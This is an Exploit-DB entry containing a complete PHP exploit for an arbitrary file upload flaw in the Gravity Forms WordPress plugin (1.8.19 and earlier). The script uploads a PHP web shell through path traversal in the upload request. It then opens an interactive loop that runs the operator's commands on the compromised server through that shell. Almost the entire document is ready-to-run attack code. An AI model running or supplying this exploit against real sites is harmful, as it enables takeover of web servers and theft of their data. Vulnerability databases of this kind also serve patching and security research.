WordPress Plugin Gravity Forms 1.8.19 - Arbitrary File Upload

EDB-ID:

39969

CVE:

N/A

Author:

Abk Khan

Type:

webapps

Platform:

PHP

Published:

2016-06-17

<?php
/****************************************************************************************************************************
   *
	* Exploit Title        : Gravity Forms [WP] - Arbitrary File Upload
	* Vulnerable Version(s): 1.8.19 (and below)
	* Write-Up             : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
	* Coded by             : Abk Khan [ an0nguy @ protonmail.ch ]
  *
*****************************************************************************************************************************/
error_reporting(0);

echo "
   _____                 _ _         ______    _ _     
  / ____|               (_) |       |  ____|  | | |    
 | |  __ _ __ __ ___   ___| |_ _   _| |__ __ _| | |___ 
 | | |_ | '__/ _` \ \ / / | __| | | |  __/ _` | | / __|
 | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
  \_____|_|  \__,_| \_/ |_|\__|\__, |_|  \__,_|_|_|___/
                                __/ |                  
                               |___/     > an Exploiter by AnonGuy\n";
$domain    = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
$url       = "$domain/?gf_page=upload";
$shell     = "$domain/wp-content/_input_3_khan.php5";
$separator = '-------------------------------------------------------------------';

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, '"ok"') !== false) {
    echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
    while ($testCom != 'exit') {
		$user    = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
		$b0x     = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
        echo "$user@$b0x:~$ ";
        $handle  = fopen("php://stdin", 'r');
        $testCom = trim(fgets($handle));
        fclose($handle);
        $comOut  = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
        echo $comOut;
    }
}
else {
	die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}

function get_string_between($string, $start, $end)
{
    # stolen from stackoverflow!
    $string = ' ' . $string;
    $ini    = strpos($string, $start);
    if ($ini == 0)
        return '';
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
?>